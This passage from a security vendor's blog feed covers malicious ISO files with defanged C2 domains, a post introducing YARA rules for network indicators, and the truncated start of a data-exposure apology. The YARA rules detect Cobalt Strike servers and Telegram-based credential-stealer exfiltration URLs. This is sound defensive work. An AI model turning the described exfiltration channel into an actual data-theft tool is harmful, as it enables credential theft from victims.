313Mb. The main purpose of the malicious injection in legit software is to download a remote binary file for execution:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOpG5V6A3bfT8DdBcUp_sHcu6Kfsa4Z_rN8WtNrebhHmgLMIKysneCk4AYhEdZpu6q1sYBNZyd8rLeK1_Yhwuo5DSoFTP3IO04sSGAyWLKG5_rcsQMieh7K6alVhu6Tn9V9MMK_wP1uEHwuXWJuFXZ3fNZuWLME2VnXc-4lVcEfXEsahcVWogvxdhzVVY/s937/rep5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="717" data-original-width="937" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOpG5V6A3bfT8DdBcUp_sHcu6Kfsa4Z_rN8WtNrebhHmgLMIKysneCk4AYhEdZpu6q1sYBNZyd8rLeK1_Yhwuo5DSoFTP3IO04sSGAyWLKG5_rcsQMieh7K6alVhu6Tn9V9MMK_wP1uEHwuXWJuFXZ3fNZuWLME2VnXc-4lVcEfXEsahcVWogvxdhzVVY/s16000/rep5.png" /></a></div><p></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span id="docs-internal-guid-b7e97272-7fff-caec-c124-f8ec699ea995"></span></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: black; font-size: 11pt;">It is also capable of fetching remotely hosted powershell code and execute it:</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbTF7XntXENGEHZiugYMhWWDbZF_kI2UdD6yRWmsmGbgf5YdWGIP7hwbX9ME2RsmNZDqz4Jc4OAV27EELjHIVIeFAuB34VCUGFeCyup8_SmbShKSfZ7rv-6rkVguUsHPuSMNyh4N3a-rpYynN6m3AaII5oVlf9jcPTGk9wDDdm7ZujpHJwA6VghqGIBBM/s937/rep6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="937" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbTF7XntXENGEHZiugYMhWWDbZF_kI2UdD6yRWmsmGbgf5YdWGIP7hwbX9ME2RsmNZDqz4Jc4OAV27EELjHIVIeFAuB34VCUGFeCyup8_SmbShKSfZ7rv-6rkVguUsHPuSMNyh4N3a-rpYynN6m3AaII5oVlf9jcPTGk9wDDdm7ZujpHJwA6VghqGIBBM/s16000/rep6.png" /></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">We found hundreds of samples related to this campaign related to the following C2 hosts:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span id="docs-internal-guid-be0b0c48-7fff-03e4-7cf1-a18523a9276d"></span></p><ul style="color: #1f1f1f; font-size: 10.5pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/telegramdesktop.club/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">telegramdesktop[.]club</span></a></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/telegramdesktop.digital/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">telegramdesktop[.]digital</span></a></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/fuckuavsystemsfewgqsg.live/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">fuckuavsystemsfewgqsg[.]live</span></a></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/installmarkets.hair/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">installmarkets[.]hair</span></a></p></li></ul><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2AzIqC5Om2vEXaaZ959MlOMeXs1Oq78jWE251J2Y__M3QeCCmO0yrpReUBcrzPtIJ2VkSm2XidBKjCAELGpPMqdYibZhTPViUj8p5YbLXJHNfkoYizs0TDpY73QkjBDa3VM-7vyH4akoWlKoWXfbxas0jdQpSM9NHlIXVSvcHUkcV5GIuSqJ1ZFOjBUM/s750/rep7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="464" data-original-width="750" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2AzIqC5Om2vEXaaZ959MlOMeXs1Oq78jWE251J2Y__M3QeCCmO0yrpReUBcrzPtIJ2VkSm2XidBKjCAELGpPMqdYibZhTPViUj8p5YbLXJHNfkoYizs0TDpY73QkjBDa3VM-7vyH4akoWlKoWXfbxas0jdQpSM9NHlIXVSvcHUkcV5GIuSqJ1ZFOjBUM/s16000/rep7.png" /></a></div><span id="docs-internal-guid-c758d4a4-7fff-7bdc-c3b6-368f26f5f304"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><i> installmarkets[.]hair relations with malicious samples</i></span></p></span></div><div><span style="font-size: 14.6667px; text-wrap: nowrap;"><br /></span></div><div><span id="docs-internal-guid-6f9bc29d-7fff-31f5-022f-bde72e0ff6b7"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Other than compressing artificially inflated files, another reason to distribute ISO files is </span><a href="https://twitter.com/kuermelecke/status/1552945269905530881" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">mimicking legitimate installation software</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> packages, which you usually expect to be sizable. The following example uses a well known browser to find suspicious cases:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%3Afile%20tag%3Aisoimage%20name%3ABraveBrowserSetup/files" style="text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage name:BraveBrowserSetup</span></a></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">The previous search results in a number of files with zero AV detections. However, further manual analysis reveals their maliciousness.</span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhcRUoOOkSQohQD5obrsCOV2Y6_A9UeNvSi8yC6T1feJfyKc_RBRzvwhcR3RnV_nrnvCDWK1FV01FsSbNYqFGfcnxWFmu9R-MflsqWCCtCOLVr9G1O4x1ILbrKz7T9BuYRT6Y2Gem9LtLomBl1R8l-EN5pEhdf6jcei6bFZVlGiUyAkk-F7Nfywihy0Fs/s942/rep8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="863" data-original-width="942" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhcRUoOOkSQohQD5obrsCOV2Y6_A9UeNvSi8yC6T1feJfyKc_RBRzvwhcR3RnV_nrnvCDWK1FV01FsSbNYqFGfcnxWFmu9R-MflsqWCCtCOLVr9G1O4x1ILbrKz7T9BuYRT6Y2Gem9LtLomBl1R8l-EN5pEhdf6jcei6bFZVlGiUyAkk-F7Nfywihy0Fs/s16000/rep8.png" /></a></div><span id="docs-internal-guid-b04858a6-7fff-e844-f671-32430709609a"><div style="text-align: center;"><span style="font-size: 11pt;"><i> Malicious samples with 0 AV detections mimicking Brave browser installer</i></span></div><div style="text-align: center;"><span style="font-size: 11pt; font-style: italic;"><br /></span></div></span></div><div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">There are different ways to explore what are the main spreading vectors used to distribute malicious ISO files and their related infrastructure. For instance, the following query provides samples seen being hosted In-The-Wild:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520p%253A10%252B%2520have%253Aitw/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage p:10+ have:itw</span></a></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">You can refine the search to list samples seen being hosted in a specific host:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520p%253A10%252B%2520itw%253Acdn.discordapp.com/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage p:10+ itw:cdn.discordapp.com</span></a></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Email spreading can filtered using the “attachment” tag or “email_parents”, they both provide pretty much the same results:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520p%253A10%252B%2520(%2520tag%253Aattachment%2520OR%2520have%253Aemail_parents%2520)/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage p:10+ (tag:attachment OR have:email_parents)</span></a></div><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial, sans-serif" style="color: #434343; font-size: 14pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline;">Wrapping it up</span></h3><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 3pt 0pt 6pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Attackers are constantly rotating the file formats they use to deliver malware. This is done to increase the effectiveness of their campaigns and to avoid detection by security measures. The security community needs to be aware of the use of alternative file formats for malware delivery and to put more resources into stopping these new spreading methods. For example, although traditional file types, such as Word, Excel, and RTF, are still used for malware delivery, alternative formats, such as OneNote and ISO, are becoming increasingly popular.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: -3pt 0pt 6pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">As a proof of the effectiveness of format rotation for attackers, the simple fact of bundling a malicious sample inside of an ISO file seems to effectively decrease AV detections. We also observed poor detection in the first waves of OneNote malicious files, although improved with time. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">We suggest monitoring malware spreading trends, and actively check how your security stack responds to proactively minimize infection risks, as well as including in your analysis all logs to/from allowed legitimate sites as they are regularly used for malware distribution, do not exclusively focus your anomaly detection on unknown traffic. </span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Happy hunting!</span></p></span></div></span></div></div></span></div></span>Vicente Díazhttp://www.blogger.com/profile/11514421601563728512noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-20923783706513312932023-07-24T12:39:00.005+02:002023-07-28T13:53:51.782+02:00Actionable Threat Intel (IV) - YARA beyond files: extending rules to network IoCs<div class="interval_12"> We are extremely excited to introduce <b>YARA Netloc</b>, a powerful new hunting feature that extends YARA supported entities from traditional files <b>to network infrastructure</b>, including <b>domains</b>, <b>URLs</b> and <b>IP addresses</b>. This opens endless possibilities and brings your hunting to a whole new level. Let’s get started!
</div>
<br>
<div class="central_img width_80 interval_12">
<img src="https://lh6.googleusercontent.com/fx89fxnBlCweg2ZfPHqau9I4LfUffPRlXNySb_YpaIRDtq8F-BCLmoTEnjQDoiuK49FsF20zh3As1t010gI3zrWti3B0LYCQq-0jv7EsRJdbIGlMfj4bD5tnR929IFZwRwoJgsYSljn3jD3CXtb-Z5dV_tJYmTMGEzV7gwe1VnFjtzGJNvsZ6qsopTO_F1PxUjd3JTIlGWkf0-k9ASkb4F1Up4aFnWR2fmTbsA" />
</div>
<br>
<h2 style="text-align: left;">Creating Network rules</h2>
<div class="interval_12">
<b>YARA Netloc</b> is based on extended functionality implemented for the “vt” YARA module. In particular, you will find now a new ".net" attribute specifically for network related entities such as URLs, domains and IP addresses. <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">Here you can find the full documentation</a>. Remember you can use the “vt” YARA module for any of your LiveHunt YARA rules.
</div>
<div class="interval_12">
Before we start working on a few examples it is important to highlight what resources you have available to get you quickly up to speed. First, our new <b><a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank">YARA editor</a></b> has available several <b>templates</b> you can use to build your rules. Second, the whole community can benefit from VirusTotal’s community rules in our new <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">crowdsourced <b>YARA GitHub repository</b></a>. The repository is split into four folders, each of which with rules matching different entities (file, domain, IP or URL).
</div>
<div class="interval_12">
Let’s start with a first example rule. The “<b>New Livehunt Ruleset</b>” dropdown on the <a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank"><b>Livehunt</b></a> section now allows us to select what kind of YARA we want to create, depending on the entity we want to match against.
</div>
<br>
<div class="central_img width_30 interval_12">
<img src="https://lh3.googleusercontent.com/0XB4J3Xjs4qkRB8FZ7hcSYkTQizGxTLd6CHu_Vw3hXw6vB4IEO-B4RCP0dAuGqt3J9uV242rc-BtSOMOFzNw5P6qZwOEmavO8uuWU7JQ5DvEBchKoy_PZtfZU6WEpr3mawOvY6vTZRzb3gpnrKGvMwpiuLXSYIF6XzQNhwybkJWaSYWwHsbaE7-OiZxbhBYWMZC4miTGEIM9QusLmHuBkBeyxxafIfbYjZeL8Q" />
</div>
<br>
<div class="interval_12">
Let’s select “<b>New ruleset matching against Domains</b>” to deploy a rule to track if any of our domains is serving malware without our knowledge. We will use the “<b>Domain serving malicious files</b>” <b>template</b> available on the YARA editor.
</div>
<br>
<div class="central_img width_40 interval_12">
<img src="https://lh3.googleusercontent.com/6uSFICpWJ_sMfaSNF_ggW5664ailkV1KFR3eqP3-B2xYBLuIdF67szX3ouh0QFkwSfN1cY09RKruVSdjSOsvAeW9MBIJIbAUMF1fL82qeVaBST7KdzTWO7wFeGF8lD1FvrTVQEBkK6TxoPQDY_joQi8ny8f7hLcTWFYptLkFQN-SW0rROC4F941SzLl8ej7gHPWpT2_93q-ZERSV-EoOYY5t1aEO04kwWyJkXw" />
</div>
<br>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br/><br/>
<mark class="blue">rule</mark> malware_distribution <mark class="dark-blue">{</mark><br/>
<mark class="blue">meta</mark>:<br/>
description = <mark class="red">"Detects if my infrastructure is being used to distribute malware or malicious domains are impersonating my legitimate domain with the same purpose."</mark><br/>
category = <mark class="red">"infra-monitoring"</mark><br/>
references = <mark class="red">"https://www.virustotal.com/gui/search/entity%253Adomain%2520domain%253Atelegram.com%2520downloaded_files_max_detections%253A5%252B/domains"</mark><br/>
creation_date = <mark class="red">"2023-07-19"</mark><br/>
last_modified = <mark class="red">"2023-07-19"</mark><br/>
target_entity = <mark class="red">"domains"</mark><br/>
<mark class="blue">condition</mark>:<br/>
vt.net.domain.raw <mark class="blue">icontains</mark> <mark class="red">"telegram.com"</mark> <mark class="blue">and</mark><br/>
vt.net.domain.downloaded_file.analysis_stats.malicious >= <mark class="green">5</mark> <br/>
<mark class="dark-blue">}</mark>
</div>
<div class="interval_12">
In this case we can easily see how the new “.net” attribute is used in this rule. First we use “domain.raw” to specify our domain by comparing it to a given string (“telegram.com” in this example). Then we simply check if any new downloaded file from that domain looks suspicious by having five or more antivirus verdicts. We will keep this rule running as a Livehunt, and will be notified through <b><a href="https://blog.virustotal.com/2023/06/actionable-threat-intel-ii-ioc-stream.html" target="_blank">IoC Stream</a></b> in case VirusTotal sees our domain downloading anything suspicious.
</div>
<br>
<div class="interval_12">
Let’s see another example.
</div>
<div class="interval_12">
Now we are going to reuse one of the rules available in our <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">repository</a>, in this case to track Cobalt Strike’s infrastructure. The rule tracks IP addresses serving a well-known Cobalt Strike certificate, which we check with the “ip.https_certificate.thumbprint” condition. We could easily create similar rules for all kinds of suspicious infrastructure serving https certificates identified as malicious.
</div>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br/><br/>
<mark class="blue">rule</mark> Cobalt_Strike_Default_SSL_Certificate<br/>
<mark class="dark-blue">{</mark><br/>
<mark class="blue">meta</mark>:<br/>
name = <mark class="red">"Default CobaltStrike self-signed SSL Certificate"</mark><br/>
description = <mark class="red">"Find IP addresses serving the default SSL certificate used out of the box by Cobalt Strike for C2 comms"</mark><br/>
reference = <mark class="red">"https://www.mandiant.com/resources/blog/defining-cobalt-strike-components"</mark><br/>
target_entity = <mark class="red">"IPs"</mark><br/>
<mark class="blue">condition</mark>:<br/>
vt.net.ip.https_certificate.thumbprint == <mark class="red">"6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"</mark><br/>
<mark class="dark-blue">}</mark>
</div>
<br>
<div class="interval_12">
For our final example we will create a rule from scratch.
</div>
<div class="interval_12">
In this case we are inspired by the <a href="https://www.virustotal.com/gui/file/2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125/detection" target="_blank">Zaraza</a> bot credential stealer that exfiltrates <a href="https://telegram-bot-sdk.readme.io/reference/senddocument" target="_blank">stolen data</a> using Telegram channels so we will use VirusTotal to hunt for fresh infrastructure (URLs) used in that way. Our rule will check for known patterns in the URLs for a given domain (“api.telegram.org”), and then check if the last file seen communicating with them (“communicating_file”) seems suspicious (“analysis_stats.malicious”>5) and it has a particular AV verdict (“steal” or “exfilt”) looping its “signatures” .
</div>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br/><br/>
<mark class="blue">rule</mark> telegram_bot_stealer <mark class="dark-blue">{</mark> <br/>
<mark class="blue">meta</mark>:<br/>
description = <mark class="red">"Detects Telegram channels that bots potentially use to exfiltrate data to."</mark> <br/>
category = <mark class="red">"MAL-infra"</mark> <br/>
malware = <mark class="red">"Stealer"</mark> <br/>
reference = <mark class="red">"https://www.uptycs.com/blog/zaraza-bot-credential-password-stealer"</mark> <br/>
examples = <mark class="red">"https://www.virustotal.com/gui/file/2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125/detection, https://www.virustotal.com/gui/url/f4abd85188b86df95c7f8571f8043d92ad033b6376a113fd0acd8714bd345798/detection"</mark> <br/>
creation_date = <mark class="red">"2023-07-06"</mark> <br/>
last_modified = <mark class="red">"2023-07-06"</mark> <br/>
target_entity = <mark class="red">"url"</mark> <br/><br/>
<mark class="blue">condition</mark>:<br/>
vt.net.url.raw <mark class="blue">icontains</mark> <mark class="red">"https://api.telegram.org/bot"</mark> <mark class="blue">and</mark><br/>
<mark class="green">(</mark><br/>
(<br/>
vt.net.url.raw <mark class="blue">icontains</mark> <mark class="red">"/sendMessage?"</mark> <mark class="blue">and</mark><br/>
vt.net.url.query <mark class="blue">icontains</mark> <mark class="red">"text="</mark><br/>
) <mark class="blue">or</mark><br/>
vt.net.url.raw <mark class="blue">icontains</mark> <mark class="red">"/sendDocument?"</mark><br/>
<mark class="green">)</mark> <mark class="blue">and</mark><br/>
vt.net.url.query <mark class="blue">icontains</mark> <mark class="red">"chat_id="</mark> <mark class="blue">and</mark><br/>
vt.net.url.communicating_file.analysis_stats.malicious > <mark class="green">5</mark> <mark class="blue">and</mark><br/>
<mark class="blue">for any</mark> engine, signature <mark class="blue">in</mark> vt.net.url.communicating_file.signatures : <mark class="green">(</mark> <br/>
signature <mark class="blue">icontains</mark> <mark class="red">"steal"</mark> <mark class="blue">or</mark> signature <mark class="blue">icontains</mark> <mark class="red">"exfilt"</mark><br/>
<mark class="green">)</mark><br/>
<mark class="dark-blue">}</mark>
</div>
<br/>
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
YARA rules are no longer limited only to tracking files. The new “.net” attribute in the “vt” YARA module empowers users with the ability to discover suspicious network infrastructure and combine it with VirusTotal’s metadata for a huge range of use cases.
</div>
<div class="interval_12">
The YARA “vt” module provides standardized syntax for <b>files</b> and <b>network</b> detection rules and allows combining attributes of different entities for highly customized monitoring rules. Additionally, it replaces the need of periodic (manual, but specially automated) lookups by allowing the deployment of Livehunt rules for monitoring.
</div>
<div class="interval_12">
Although this blog post shows some of the new YARA Netloc capabilities using a few examples, there are infinite possibilities. You can use it to track threat actors’ infrastructure, to monitor your own infrastructure (including IP ranges) or to detect phishing campaigns targeting your company, amongst many other use cases. You can find many more ideas by checking the YARA editor templates, checking the official <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">documentation</a> or the YARA rules <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">GitHub repository</a>.
</div>
<div class="interval_12">
We will be back soon with more details, use cases and examples for YARA Netloc hunting capabilities, but in the meantime do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a> for anything you need.
</div>
<div class="interval_12">
Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-52536031898978690192023-07-21T01:09:00.000+02:002023-07-21T01:09:10.686+02:00 Apology and Update on Recent Accidental Data Exposure<span id="docs-internal-guid-4fe28641-7fff-ea63-090d-c13bff1eecd6"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; white-space-collapse: preserve;">We are writing to share information about the recent customer data exposure incident on VirusTotal. We apologize for any concern or confusion this may have caused.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">On June 29, an employee accidentally uploaded a CSV file to the VirusTotal platform. This CSV file contained limited information of our Premium account customers, specifically the names of companies, the associated VirusTotal group names, and the email addresses of group administrators. We removed the file, which was only accessible to partners and corporate clients, from our platform within one hour of its posting.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">First and foremost, we want to clarify 